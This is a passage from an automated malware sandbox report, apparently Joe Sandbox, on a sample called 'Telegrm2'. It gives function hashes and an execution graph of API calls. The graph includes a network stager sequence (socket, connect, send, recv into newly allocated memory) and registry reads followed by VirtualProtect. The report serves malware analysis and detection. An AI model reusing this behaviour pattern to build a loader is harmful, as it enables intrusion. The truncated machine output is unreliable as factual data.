                                            • Instruction Fuzzy Hash: 3D011225225A8581EA21DF65FCA47AA7364F7C8BC8F845111DA8D47618DF3CC249CB44
                                            Function 02DCD7B0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 27COMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2904259663.0000000002DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2db0000_Telegrm2.jbxd
                                            Similarity
                                            • API ID: __doserrno_errno
                                            • String ID: M
                                            • API String ID: 921712934-3664761504
                                            • Opcode ID: 55f1f2b5d4f88ce944560703f07ace5cba4083014a431a69087704bf253f0c3d
                                            • Instruction ID: 13b6521d448353187576cd556d4f1c3f6056dd61119e86e7204e8b477927371f
                                            • Opcode Fuzzy Hash: 55f1f2b5d4f88ce944560703f07ace5cba4083014a431a69087704bf253f0c3d
                                            • Instruction Fuzzy Hash: CDE0DF7220C2084DE3086F24E8063B837C2FB43330F90410EC4AA47680DA7A04024B51
                                            Function 030BDDF8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 20COMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2904436753.00000000030A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030A0000, based on PE: true
                                            • Associated: 00000000.00000002.2904436753.00000000030C8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000000.00000002.2904436753.0000000003381000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_30a0000_Telegrm2.jbxd
                                            Similarity
                                            • API ID: __doserrno_errno
                                            • String ID: M
                                            • API String ID: 921712934-3664761504
                                            • Opcode ID: 54bb3b1f6682e9691d08df09548611bc11df6481e8e12b4544a617f6c70afd69
                                            • Instruction ID: 4d65d56d3f19c0eaebaf0023519b6363823f24dba4cee8c84298e4e788d59902
                                            • Opcode Fuzzy Hash: 54bb3b1f6682e9691d08df09548611bc11df6481e8e12b4544a617f6c70afd69
                                            • Instruction Fuzzy Hash: 6DE0EC7B50164089F357EF64F85139A2AA4A791338F8182529BA80A6C0CA7C44C78B10
                                            Function 02DB5B08 Relevance: 5.1, APIs: 4, Instructions: 88COMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2904259663.0000000002DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2db0000_Telegrm2.jbxd
                                            Similarity
                                            • API ID: free$_errno
                                            • String ID:
                                            • API String ID: 2288870239-0
                                            • Opcode ID: b863403ab495316a5b6b17ca1e1e139bea759e5f61c69152686c6568255f01be
                                            • Instruction ID: e3989c78efda58eb99c50e126fd9bcb521b1611b6a03f40d3e11dafab90b4ba5
                                            • Opcode Fuzzy Hash: b863403ab495316a5b6b17ca1e1e139bea759e5f61c69152686c6568255f01be
                                            • Instruction Fuzzy Hash: 27213D31214E4A9FCBA5FF19D0A8B6673E2FF98310B9405AD844AC3751CF31EC468B50
                                            Function 030A6150 Relevance: 5.1, APIs: 4, Instructions: 54COMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            • free.LIBCMT ref: 030A618B
                                              • Part of subcall function 030B3D28: HeapFree.KERNEL32(?,?,00000000,030B4940,?,?,2800000000000000,030B3209,?,?,?,?,030B57C6,?,?,2800000000000000), ref: 030B3D3E
                                              • Part of subcall function 030B3D28: _errno.LIBCMT ref: 030B3D48
                                              • Part of subcall function 030B3D28: GetLastError.KERNEL32(?,?,00000000,030B4940,?,?,2800000000000000,030B3209,?,?,?,?,030B57C6,?,?,2800000000000000), ref: 030B3D50
                                            • free.LIBCMT ref: 030A61B3
                                            • free.LIBCMT ref: 030A61CD
                                            • free.LIBCMT ref: 030A61FB
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2904436753.00000000030A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030A0000, based on PE: true
                                            • Associated: 00000000.00000002.2904436753.00000000030C8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000000.00000002.2904436753.0000000003381000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_30a0000_Telegrm2.jbxd
                                            Similarity
                                            • API ID: free$ErrorFreeHeapLast_errno
                                            • String ID:
                                            • API String ID: 1012874770-0
                                            • Opcode ID: 926a81a16b6259c14920b2060e70d6e26c74df43b3fa4f2c08237a8ba31f8c32
                                            • Instruction ID: a1341150fabc875d6afccdba589659f6420f70d11946d6b26fabc04477b3b78f
                                            • Opcode Fuzzy Hash: 926a81a16b6259c14920b2060e70d6e26c74df43b3fa4f2c08237a8ba31f8c32
                                            • Instruction Fuzzy Hash: 23111C2A302F8581CA56EF16FA502ADA774FB98FC0F1C6822CF9E1BB15DF29D4518340

                                            Execution Graph

                                            Execution Coverage:2.8%
                                            Dynamic/Decrypted Code Coverage:48.3%
                                            Signature Coverage:0%
                                            Total number of Nodes:909
                                            Total number of Limit Nodes:39
                                            execution_graph 39963 24b626a0c79 39965 24b626a0c81 39963->39965 39964 24b626a0d05 socket 39967 24b626a0d1d 39964->39967 39976 24b626a0e96 39964->39976 39965->39964 39966 24b626a0cda WSAStartup 39965->39966 39968 24b626a0cf1 39966->39968 39966->39976 39969 24b626a0d62 connect 39967->39969 39968->39964 39969->39969 39970 24b626a0d7c send 39969->39970 39971 24b626a0d97 recv 39970->39971 39970->39976 39972 24b626a0dc0 NtAllocateVirtualMemory NtAllocateVirtualMemory 39971->39972 39971->39976 39973 24b626a0e40 recv 39972->39973 39974 24b626a0e59 39973->39974 39973->39976 39974->39973 39975 24b626a0e8d closesocket 39974->39975 39975->39976 39977 7ffdfb8b1a1c 39979 7ffdfb8b1a42 39977->39979 39978 7ffdfb8b1a7f 39986 7ffdfb8b1a4a 39978->39986 40031 7ffdfb8b1390 39978->40031 39979->39978 39979->39986 39989 7ffdfb8b18e0 39979->39989 39983 7ffdfb8b1ac1 39984 7ffdfb8b18e0 126 API calls 39983->39984 39983->39986 39984->39986 39985 7ffdfb8b1390 2 API calls 39987 7ffdfb8b1ab4 39985->39987 39988 7ffdfb8b18e0 126 API calls 39987->39988 39988->39983 39990 7ffdfb8b196d 39989->39990 39991 7ffdfb8b18ee 39989->39991 39993 7ffdfb8b19aa 39990->39993 39999 7ffdfb8b1971 39990->39999 40034 7ffdfb8b3b20 HeapCreate 39991->40034 39996 7ffdfb8b1a05 39993->39996 39997 7ffdfb8b19af 39993->39997 39995 7ffdfb8b18f9 39995->39978 39996->39995 40123 7ffdfb8b2ba0 47 API calls 39996->40123 40110 7ffdfb8b2cd0 39997->40110 39999->39995 40119 7ffdfb8b3498 46 API calls free 39999->40119 40002 7ffdfb8b1905 _RTC_Initialize 40005 7ffdfb8b1909 40002->40005 40013 7ffdfb8b1915 GetCommandLineA 40002->40013 40115 7ffdfb8b3b6c HeapDestroy 40005->40115 40006 7ffdfb8b199e 40009 7ffdfb8b28e4 48 API calls 40006->40009 40007 7ffdfb8b19cf FlsSetValue 40010 7ffdfb8b19e5 40007->40010 40011 7ffdfb8b19fb 40007->40011 40012 7ffdfb8b19a3 40009->40012 40121 7ffdfb8b290c 45 API calls 3 library calls 40010->40121 40122 7ffdfb8b1ea8 45 API calls 2 library calls 40011->40122 40120 7ffdfb8b3b6c HeapDestroy 40012->40120 40053 7ffdfb8b38fc 40013->40053 40018 7ffdfb8b19ec GetCurrentThreadId 40018->39995 40022 7ffdfb8b1937 40091 7ffdfb8b28e4 40022->40091 40028 7ffdfb8b194c 40030 7ffdfb8b1957 40028->40030 40117 7ffdfb8b2ee8 56 API calls 2 library calls 40028->40117 40030->39995 40118 7ffdfb8b3498 46 API calls free 40030->40118 40032 7ffdfb8b1399 GetModuleHandleA LoadLibraryA 40031->40032 40033 7ffdfb8b13c1 40031->40033 40032->40033 40033->39983 40033->39985 40035 7ffdfb8b18f5 40034->40035 40036 7ffdfb8b3b44 HeapSetInformation 40034->40036 40035->39995 40037 7ffdfb8b2be0 40035->40037 40036->40035 40124 7ffdfb8b3140 40037->40124 40039 7ffdfb8b2beb 40129 7ffdfb8b424c 40039->40129 40042 7ffdfb8b2c54 40044 7ffdfb8b28e4 48 API calls 40042->40044 40043 7ffdfb8b2bf4 FlsAlloc 40043->40042 40045 7ffdfb8b2c0c 40043->40045 40047 7ffdfb8b2c59 40044->40047 40046 7ffdfb8b2cd0 _errno 45 API calls 40045->40046 40048 7ffdfb8b2c1b 40046->40048 40047->40002 40048->40042 40049 7ffdfb8b2c23 FlsSetValue 40048->40049 40049->40042 40050 7ffdfb8b2c36 40049->40050 40133 7ffdfb8b290c 45 API calls 3 library calls 40050->40133 40052 7ffdfb8b2c40 GetCurrentThreadId 40052->40047 40054 7ffdfb8b392b GetEnvironmentStringsW 40053->40054 40055 7ffdfb8b395d 40053->40055 40056 7ffdfb8b3945 GetLastError 40054->40056 40057 7ffdfb8b3939 40054->40057 40055->40057 40058 7ffdfb8b3a20 40055->40058 40056->40055 40060 7ffdfb8b396b GetEnvironmentStringsW 40057->40060 40065 7ffdfb8b3980 WideCharToMultiByte 40057->40065 40059 7ffdfb8b3a2d GetEnvironmentStrings 40058->40059 40061 7ffdfb8b1927 40058->40061 40059->40061 40068 7ffdfb8b3a3f 40059->40068 40060->40061 40060->40065 40078 7ffdfb8b31a8 GetStartupInfoA 40061->40078 40063 7ffdfb8b3a0f 40067 7ffdfb8b3a12 FreeEnvironmentStringsW 40063->40067 40064 7ffdfb8b39ce 40136 7ffdfb8b2c64 40064->40136 40065->40063 40065->40064 40067->40061 40069 7ffdfb8b2c64 __setargv 45 API calls 40068->40069 40070 7ffdfb8b3a63 40069->40070 40072 7ffdfb8b3a6b FreeEnvironmentStringsA 40070->40072 40073 7ffdfb8b3a79 __initmbctable 40070->40073 40072->40061 40076 7ffdfb8b3a87 FreeEnvironmentStringsA 40073->40076 40074 7ffdfb8b39de WideCharToMultiByte 40074->40067 40075 7ffdfb8b3a07 40074->40075 40141 7ffdfb8b1ea8 45 API calls 2 library calls 40075->40141 40076->40061 40079 7ffdfb8b2cd0 _errno 45 API calls 40078->40079 40086 7ffdfb8b31e5 40079->40086 40080 7ffdfb8b33d1 GetStdHandle 40081 7ffdfb8b33ab 40080->40081 40081->40080 40082 7ffdfb8b3400 GetFileType 40081->40082 40084 7ffdfb8b3460 SetHandleCount 40081->40084 40090 7ffdfb8b1933 40081->40090 40163 7ffdfb8b5790 InitializeCriticalSectionAndSpinCount 40081->40163 40082->40081 40083 7ffdfb8b2cd0 _errno 45 API calls 40083->40086 40084->40090 40085 7ffdfb8b3314 40085->40081 40087 7ffdfb8b3347 GetFileType 40085->40087 40085->40090 40162 7ffdfb8b5790 InitializeCriticalSectionAndSpinCount 40085->40162 40086->40081 40086->40083 40086->40085 40086->40090 40087->40085 40090->40022 40099 7ffdfb8b3804 40090->40099 40092 7ffdfb8b2900 40091->40092 40093 7ffdfb8b28f3 FlsFree 40091->40093 40094 7ffdfb8b430b DeleteCriticalSection 40092->40094 40095 7ffdfb8b4329 40092->40095 40093->40092 40164 7ffdfb8b1ea8 45 API calls 2 library calls 40094->40164 40097 7ffdfb8b4337 DeleteCriticalSection 40095->40097 40098 7ffdfb8b4346 40095->40098 40097->40095 40098->40005 40100 7ffdfb8b381c 40099->40100 40101 7ffdfb8b3821 GetModuleFileNameA 40099->40101 40165 7ffdfb8b51c8 40100->40165 40103 7ffdfb8b3853 40101->40103 40169 7ffdfb8b3634 45 API calls __setargv 40103->40169 40105 7ffdfb8b3877 40106 7ffdfb8b2c64 __setargv 45 API calls 40105->40106 40109 7ffdfb8b1943 40105->40109 40107 7ffdfb8b38a7 40106->40107 40107->40109 40170 7ffdfb8b3634 45 API calls __setargv 40107->40170 40109->40030 40116 7ffdfb8b3504 83 API calls 4 library calls 40109->40116 40111 7ffdfb8b2cf5 40110->40111 40113 7ffdfb8b19c3 40111->40113 40114 7ffdfb8b2d13 Sleep 40111->40114 40373 7ffdfb8b51f0 40111->40373 40113->39995 40113->40007 40114->40111 40114->40113 40115->39995 40116->40028 40117->40030 40118->40022 40119->40006 40120->39995 40121->40018 40122->39995 40123->39995 40134 7ffdfb8b28cc EncodePointer 40124->40134 40126 7ffdfb8b314b _initp_misc_winsig 40127 7ffdfb8b54bc EncodePointer 40126->40127 40128 7ffdfb8b318e EncodePointer 40127->40128 40128->40039 40130 7ffdfb8b426f 40129->40130 40132 7ffdfb8b2bf0 40130->40132 40135 7ffdfb8b5790 InitializeCriticalSectionAndSpinCount 40130->40135 40132->40042 40132->40043 40133->40052 40135->40130 40137 7ffdfb8b2c80 40136->40137 40139 7ffdfb8b2cb8 40137->40139 40140 7ffdfb8b2c98 Sleep 40137->40140 40142 7ffdfb8b1d34 40137->40142 40139->40063 40139->40074 40140->40137 40140->40139 40141->40063 40143 7ffdfb8b1dc8 realloc 40142->40143 40152 7ffdfb8b1d4c realloc 40142->40152 40161 7ffdfb8b2534 45 API calls _errno 40143->40161 40144 7ffdfb8b1d84 RtlAllocateHeap 40147 7ffdfb8b1dbd 40144->40147 40144->40152 40147->40137 40148 7ffdfb8b1dad 40159 7ffdfb8b2534 45 API calls _errno 40148->40159 40151 7ffdfb8b1db2 40160 7ffdfb8b2534 45 API calls _errno 40151->40160 40152->40144 40152->40148 40152->40151 40155 7ffdfb8b1d64 40152->40155 40155->40144 40156 7ffdfb8b4208 45 API calls _FF_MSGBANNER 40155->40156 40157 7ffdfb8b3fe0 45 API calls _FF_MSGBANNER 40155->40157 40158 7ffdfb8b2e48 GetModuleHandleW GetProcAddress ExitProcess malloc 40155->40158 40156->40155 40157->40155 40159->40151 40160->40147 40161->40147 40162->40085 40163->40081 40164->40092 40166 7ffdfb8b51d5 40165->40166 40167 7ffdfb8b51df 40165->40167 40171 7ffdfb8b4fd0 40166->40171 40167->40101 40169->40105 40170->40109 40195 7ffdfb8b2a44 40171->40195 40178 7ffdfb8b2c64 __setargv 45 API calls 40179 7ffdfb8b5020 __initmbctable 40178->40179 40194 7ffdfb8b517d 40179->40194 40218 7ffdfb8b4d58 40179->40218 40182 7ffdfb8b505b 40188 7ffdfb8b5080 40182->40188 40228 7ffdfb8b1ea8 45 API calls 2 library calls 40182->40228 40183 7ffdfb8b517f 40184 7ffdfb8b5198 40183->40184 40183->40194 40230 7ffdfb8b1ea8 45 API calls 2 library calls 40183->40230 40231 7ffdfb8b2534 45 API calls _errno 40184->40231 40188->40194 40229 7ffdfb8b445c 45 API calls _lock 40188->40229 40194->40167 40232 7ffdfb8b29c0 GetLastError FlsGetValue 40195->40232 40197 7ffdfb8b2a4f 40198 7ffdfb8b2a5f 40197->40198 40244 7ffdfb8b2ddc 45 API calls _FF_MSGBANNER 40197->40244 40200 7ffdfb8b4b60 40198->40200 40201 7ffdfb8b2a44 _getptd 45 API calls 40200->40201 40202 7ffdfb8b4b6f 40201->40202 40203 7ffdfb8b4b8a 40202->40203 40247 7ffdfb8b445c 45 API calls _lock 40202->40247 40205 7ffdfb8b4c0e 40203->40205 40248 7ffdfb8b2ddc 45 API calls _FF_MSGBANNER 40203->40248 40211 7ffdfb8b4cc8 40205->40211 40249 7ffdfb8b4c1c 40211->40249 40214 7ffdfb8b4ce8 GetOEMCP 40217 7ffdfb8b4cf8 40214->40217 40215 7ffdfb8b4d0d 40216 7ffdfb8b4d12 GetACP 40215->40216 40215->40217 40216->40217 40217->40178 40217->40194 40219 7ffdfb8b4cc8 __initmbctable 47 API calls 40218->40219 40221 7ffdfb8b4d7f 40219->40221 40220 7ffdfb8b4d87 __initmbctable 40268 7ffdfb8b15b0 40220->40268 40221->40220 40222 7ffdfb8b4dd8 IsValidCodePage 40221->40222 40227 7ffdfb8b4dfe __initmbctable 40221->40227 40222->40220 40224 7ffdfb8b4de9 GetCPInfo 40222->40224 40224->40220 40224->40227 40225 7ffdfb8b4fbb 40225->40182 40225->40183 40258 7ffdfb8b497c GetCPInfo 40227->40258 40228->40188 40230->40184 40231->40194 40233 7ffdfb8b29e6 40232->40233 40234 7ffdfb8b2a2e SetLastError 40232->40234 40235 7ffdfb8b2cd0 _errno 40 API calls 40233->40235 40234->40197 40236 7ffdfb8b29f3 40235->40236 40236->40234 40237 7ffdfb8b29fb FlsSetValue 40236->40237 40238 7ffdfb8b2a27 40237->40238 40239 7ffdfb8b2a11 40237->40239 40246 7ffdfb8b1ea8 45 API calls 2 library calls 40238->40246 40245 7ffdfb8b290c 45 API calls 3 library calls 40239->40245 40242 7ffdfb8b2a18 GetCurrentThreadId 40242->40234 40243 7ffdfb8b2a2c 40243->40234 40245->40242 40246->40243 40250 7ffdfb8b4c32 40249->40250 40254 7ffdfb8b4c96 40249->40254 40251 7ffdfb8b2a44 _getptd 45 API calls 40250->40251 40252 7ffdfb8b4c37 40251->40252 40253 7ffdfb8b4c6f 40252->40253 40257 7ffdfb8b4870 45 API calls 3 library calls 40252->40257 40253->40254 40256 7ffdfb8b4b60 __initmbctable 45 API calls 40253->40256 40254->40214 40254->40215 40256->40254 40257->40253 40259 7ffdfb8b49be __initmbctable 40258->40259 40267 7ffdfb8b4aaa 40258->40267 40279 7ffdfb8b62a4 40259->40279 40262 7ffdfb8b15b0 __initmbctable 8 API calls 40263 7ffdfb8b4b4a 40262->40263 40263->40220 40266 7ffdfb8b6938 __initmbctable 78 API calls 40266->40267 40267->40262 40269 7ffdfb8b15b9 40268->40269 40270 7ffdfb8b15c4 40269->40270 40271 7ffdfb8b1b74 RtlCaptureContext RtlLookupFunctionEntry 40269->40271 40270->40225 40272 7ffdfb8b1bb8 RtlVirtualUnwind 40271->40272 40273 7ffdfb8b1bf9 40271->40273 40274 7ffdfb8b1c1b IsDebuggerPresent 40272->40274 40273->40274 40372 7ffdfb8b3fd8 40274->40372 40276 7ffdfb8b1c7a SetUnhandledExceptionFilter UnhandledExceptionFilter 40277 7ffdfb8b1ca2 GetCurrentProcess TerminateProcess 40276->40277 40278 7ffdfb8b1c98 _FF_MSGBANNER 40276->40278 40277->40225 40278->40277 40280 7ffdfb8b4c1c __initmbctable 45 API calls 40279->40280 40281 7ffdfb8b62c8 40280->40281 40289 7ffdfb8b6038 40281->40289 40284 7ffdfb8b6938 40285 7ffdfb8b4c1c __initmbctable 45 API calls 40284->40285 40286 7ffdfb8b695c 40285->40286 40317 7ffdfb8b63f8 40286->40317 40290 7ffdfb8b6088 GetStringTypeW 40289->40290 40291 7ffdfb8b60c5 40289->40291 40292 7ffdfb8b60aa GetLastError 40290->40292 40293 7ffdfb8b60a2 40290->40293 40291->40293 40294 7ffdfb8b61f4 40291->40294 40292->40291 40295 7ffdfb8b61ed 40293->40295 40296 7ffdfb8b60ee MultiByteToWideChar 40293->40296 40314 7ffdfb8b6d80 67 API calls __initmbctable 40294->40314 40298 7ffdfb8b15b0 __initmbctable 8 API calls 40295->40298 40296->40295 40302 7ffdfb8b611c 40296->40302 40300 7ffdfb8b4a41 40298->40300 40299 7ffdfb8b621e 40299->40295 40301 7ffdfb8b624f GetStringTypeA 40299->40301 40315 7ffdfb8b6dd4 60 API calls 5 library calls 40299->40315 40300->40284 40301->40295 40304 7ffdfb8b6272 40301->40304 40305 7ffdfb8b1d34 malloc 45 API calls 40302->40305 40308 7ffdfb8b6141 __initmbctable 40302->40308 40316 7ffdfb8b1ea8 45 API calls 2 library calls 40304->40316 40305->40308 40306 7ffdfb8b61a8 MultiByteToWideChar 40310 7ffdfb8b61ca GetStringTypeW 40306->40310 40311 7ffdfb8b61df 40306->40311 40307 7ffdfb8b6244 40307->40295 40307->40301 40308->40295 40308->40306 40310->40311 40311->40295 40313 7ffdfb8b1ea8 45 API calls 2 library calls 40311->40313 40313->40295 40314->40299 40315->40307 40316->40295 40318 7ffdfb8b6450 LCMapStringW 40317->40318 40321 7ffdfb8b6474 40317->40321 40319 7ffdfb8b6480 GetLastError 40318->40319 40318->40321 40319->40321 40320 7ffdfb8b6742 40366 7ffdfb8b6d80 67 API calls __initmbctable 40320->40366 40321->40320 40322 7ffdfb8b64ef 40321->40322 40323 7ffdfb8b673b 40322->40323 40325 7ffdfb8b650d MultiByteToWideChar 40322->40325 40326 7ffdfb8b15b0 __initmbctable 8 API calls 40323->40326 40325->40323 40332 7ffdfb8b653c 40325->40332 40328 7ffdfb8b4a74 40326->40328 40327 7ffdfb8b6770 40327->40323 40329 7ffdfb8b68cb LCMapStringA 40327->40329 40330 7ffdfb8b678f 40327->40330 40328->40266 40349 7ffdfb8b67d7 40329->40349 40367 7ffdfb8b6dd4 60 API calls 5 library calls 40330->40367 40331 7ffdfb8b65b8 MultiByteToWideChar 40334 7ffdfb8b672d 40331->40334 40335 7ffdfb8b65e2 LCMapStringW 40331->40335 40336 7ffdfb8b656d __initmbctable 40332->40336 40337 7ffdfb8b1d34 malloc 45 API calls 40332->40337 40334->40323 40365 7ffdfb8b1ea8 45 API calls 2 library calls 40334->40365 40335->40334 40339 7ffdfb8b660c 40335->40339 40336->40323 40336->40331 40337->40336 40338 7ffdfb8b67a7 40338->40323 40341 7ffdfb8b67af LCMapStringA 40338->40341 40340 7ffdfb8b6617 40339->40340 40348 7ffdfb8b6652 40339->40348 40340->40334 40345 7ffdfb8b662e LCMapStringW 40340->40345 40341->40349 40350 7ffdfb8b67de 40341->40350 40342 7ffdfb8b68fb 40342->40323 40371 7ffdfb8b1ea8 45 API calls 2 library calls 40342->40371 40345->40334 40347 7ffdfb8b66bf LCMapStringW 40351 7ffdfb8b671f 40347->40351 40352 7ffdfb8b66e0 WideCharToMultiByte 40347->40352 40353 7ffdfb8b1d34 malloc 45 API calls 40348->40353 40361 7ffdfb8b6670 __initmbctable 40348->40361 40349->40342 40370 7ffdfb8b1ea8 45 API calls 2 library calls 40349->40370 40355 7ffdfb8b67ff __initmbctable 40350->40355 40356 7ffdfb8b1d34 malloc 45 API calls 40350->40356 40351->40334 40364 7ffdfb8b1ea8 45 API calls 2 library calls 40351->40364 40352->40351 40353->40361 40354 7ffdfb8b6861 LCMapStringA 40357 7ffdfb8b6889 40354->40357 40358 7ffdfb8b688d 40354->40358 40355->40349 40355->40354 40356->40355 40357->40349 40369 7ffdfb8b1ea8 45 API calls 2 library calls 40357->40369 40368 7ffdfb8b6dd4 60 API calls 5 library calls 40358->40368 40361->40334 40361->40347 40364->40334 40365->40323 40366->40327 40367->40338 40368->40357 40369->40349 40370->40342 40371->40323 40372->40276 40374 7ffdfb8b5205 40373->40374 40379 7ffdfb8b5237 realloc 40373->40379 40375 7ffdfb8b5213 40374->40375 40374->40379 40382 7ffdfb8b2534 45 API calls _errno 40375->40382 40376 7ffdfb8b524f RtlAllocateHeap 40378 7ffdfb8b5233 40376->40378 40376->40379 40378->40111 40379->40376 40379->40378 40380 7ffdfb8b5218 40383 7ffdfb8b2464 7 API calls _FF_MSGBANNER 40380->40383 40382->40380 40383->40378 40384 24b626a0bed 40385 24b626a0bf5 40384->40385 40386 24b626a0c05 LdrLoadDll 40385->40386 40387 24b626a0c2b 40386->40387 40388 7ffdfb8b1050 40389 7ffdfb8b107a 40388->40389 40398 7ffdfb8b135b 40388->40398 40391 7ffdfb8b108a GetProcAddress RegOpenKeyExW 40389->40391 40389->40398 40390 7ffdfb8b15b0 __initmbctable 8 API calls 40392 7ffdfb8b137d 40390->40392 40393 7ffdfb8b1105 40391->40393 40391->40398 40399 7ffdfb8b13d0 40393->40399 40395 7ffdfb8b112d __initmbctable 40396 7ffdfb8b114b GetProcAddress RegGetValueW 40395->40396 40397 7ffdfb8b1238 GetProcAddress RegCloseKey GetProcAddress VirtualProtect 40396->40397 40396->40398 40397->40398 40398->40390 40401 7ffdfb8b1404 40399->40401 40400 7ffdfb8b148c 40409 7ffdfb8b1844 40400->40409 40401->40400 40420 7ffdfb8b15d0 45 API calls 2 library calls 40401->40420 40404 7ffdfb8b146f 40421 7ffdfb8b2830 RaiseException __initmbctable 40404->40421 40406 7ffdfb8b14d8 40406->40395 40412 7ffdfb8b184f realloc 40409->40412 40410 7ffdfb8b1d34 malloc 45 API calls 40410->40412 40411 7ffdfb8b1491 40411->40406 40422 7ffdfb8b1750 45 API calls 3 library calls 40411->40422 40412->40410 40412->40411 40415 7ffdfb8b186e 40412->40415 40413 7ffdfb8b18b5 40424 7ffdfb8b1660 45 API calls 2 library calls 40413->40424 40415->40413 40423 7ffdfb8b27dc 55 API calls _cinit 40415->40423 40416 7ffdfb8b18c6 40425 7ffdfb8b2830 RaiseException __initmbctable 40416->40425 40419 7ffdfb8b18dc 40420->40404 40421->40400 40422->40406 40423->40413 40424->40416 40425->40419 40426 24b645821c0 40439 24b645931b0 40426->40439 40428 24b645822d4 40452 24b64592c00 40428->40452 40429 24b64582240 select 40437 24b645822a1 40429->40437 40438 24b645821f2 ctype 40429->40438 40431 24b64582264 recv 40433 24b645822b9 40431->40433 40431->40438 40432 24b6458236c 40451 24b64582380 71 API calls ctype 40433->40451 40434 24b645822e8 setsockopt CancelIo closesocket SetEvent 40434->40428 40436 24b64593200 62 API calls _errno 40436->40438 40437->40428 40437->40434 40438->40428 40438->40429 40438->40431 40438->40436 40438->40437 40440 24b64593290 40439->40440 40442 24b645932b4 40440->40442 40446 24b645932ba std::_Facet_Register 40440->40446 40463 24b64595728 40440->40463 40480 24b645957e8 RtlDecodePointer 40440->40480 40442->40438 40444 24b6459330b 40482 24b64593854 62 API calls std::exception::operator= 40444->40482 40446->40444 40481 24b64593f8c 72 API calls _cinit 40446->40481 40447 24b6459331c 40483 24b6459581c RaiseException ctype 40447->40483 40450 24b64593332 40451->40438 40453 24b64592c09 40452->40453 40454 24b64592c14 40453->40454 40455 24b64594554 RtlCaptureContext RtlLookupFunctionEntry 40453->40455 40454->40432 40456 24b64594598 RtlVirtualUnwind 40455->40456 40457 24b645945d9 40455->40457 40458 24b645945fb IsDebuggerPresent 40456->40458 40457->40458 40536 24b64599984 40458->40536 40460 24b6459465a SetUnhandledExceptionFilter UnhandledExceptionFilter 40461 24b64594678 _cftof_l 40460->40461 40462 24b64594682 GetCurrentProcess TerminateProcess 40460->40462 40461->40462 40462->40432 40464 24b645957bc 40463->40464 40465 24b64595740 40463->40465 40491 24b645957e8 RtlDecodePointer 40464->40491 40467 24b64595778 RtlAllocateHeap 40465->40467 40472 24b645957a1 40465->40472 40476 24b645957a6 40465->40476 40479 24b64595758 40465->40479 40487 24b645957e8 RtlDecodePointer 40465->40487 40467->40465 40471 24b645957b1 40467->40471 40468 24b645957c1 40470 24b64593200 _errno 61 API calls 40468->40470 40470->40471 40471->40440 40488 24b64593200 40472->40488 40478 24b64593200 _errno 61 API calls 40476->40478 40478->40471 40479->40467 40484 24b6459a4a4 62 API calls 2 library calls 40479->40484 40485 24b6459a244 62 API calls 4 library calls 40479->40485 40486 24b64594f94 GetModuleHandleW GetProcAddress ExitProcess malloc 40479->40486 40480->40440 40481->40444 40482->40447 40483->40450 40484->40479 40485->40479 40487->40465 40492 24b645948d4 GetLastError FlsGetValue 40488->40492 40490 24b64593209 40490->40476 40491->40468 40493 24b645948fa 40492->40493 40494 24b64594942 SetLastError 40492->40494 40504 24b6459537c 40493->40504 40494->40490 40497 24b6459490f FlsSetValue 40498 24b64594925 40497->40498 40499 24b6459493b 40497->40499 40509 24b6459481c 40498->40509 40518 24b64593d28 62 API calls 2 library calls 40499->40518 40503 24b64594940 40503->40494 40506 24b645953a1 40504->40506 40507 24b64594907 40506->40507 40508 24b645953bf Sleep 40506->40508 40519 24b6459a4e8 40506->40519 40507->40494 40507->40497 40508->40506 40508->40507 40528 24b64599b98 40509->40528 40511 24b64594875 40512 24b64599a98 __tzset RtlLeaveCriticalSection 40511->40512 40513 24b6459488a 40512->40513 40514 24b64599b98 _lock 62 API calls 40513->40514 40515 24b64594894 ___lc_codepage_func 40514->40515 40516 24b64599a98 __tzset RtlLeaveCriticalSection 40515->40516 40517 24b645948c6 GetCurrentThreadId 40516->40517 40517->40494 40518->40503 40520 24b6459a51a 40519->40520 40521 24b6459a4fd 40519->40521 40523 24b6459a532 RtlAllocateHeap 40520->40523 40525 24b6459a510 40520->40525 40527 24b645957e8 RtlDecodePointer 40520->40527 40521->40520 40522 24b6459a50b 40521->40522 40524 24b64593200 _errno 61 API calls 40522->40524 40523->40520 40523->40525 40524->40525 40525->40506 40527->40520 40529 24b64599bb6 40528->40529 40530 24b64599bc7 RtlAcquirePebLock 40528->40530 40534 24b64599ab0 62 API calls 6 library calls 40529->40534 40532 24b64599bbb 40532->40530 40535 24b645952d4 62 API calls 2 library calls 40532->40535 40534->40532 40536->40460 40537 24b64581e80 40538 24b6458219d 40537->40538 40554 24b64581eb3 40537->40554 40539 24b64581ed0 SleepEx 40540 24b64581ee5 GetCurrentThreadId 40539->40540 40539->40554 40550 24b64581ef3 40540->40550 40543 24b645a2478 63 API calls 40544 24b64581ff7 VirtualAlloc 40543->40544 40545 24b64581f43 ctype 40544->40545 40545->40543 40546 24b64581f9f VirtualFree 40545->40546 40547 24b645a2478 63 API calls 40545->40547 40545->40550 40551 24b64582041 VirtualFree 40545->40551 40555 24b645820ee VirtualFree 40545->40555 40571 24b645a2478 40545->40571 40546->40545 40548 24b645820a4 VirtualAlloc 40547->40548 40548->40545 40550->40545 40556 24b64582900 40550->40556 40562 24b64581370 40550->40562 40551->40545 40553 24b64582173 GetCurrentThreadId 40553->40554 40554->40538 40554->40539 40555->40545 40557 24b6458298e 40556->40557 40560 24b64582938 